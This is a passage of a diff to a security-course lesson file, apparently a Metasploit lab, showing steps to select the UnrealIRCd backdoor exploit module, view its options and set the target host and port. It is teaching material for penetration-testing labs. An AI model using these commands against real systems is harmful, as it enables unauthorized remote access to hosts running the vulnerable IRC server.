tekperfect/devops-docs/docs/courses/08-Security/lessons/metasploit-labs.md

 `use exploit/unix/irc/unreal_ircd_3281_backdoor`

+3. Next use the `show options` command to show the options required to execute the exploit

+`show options`

+4. Set the required options

 `set rhost xxx.xxx.xxx.xxx` (IP of the host you are attacking)

 `set rport 6697` (Port number IRC app is listening on)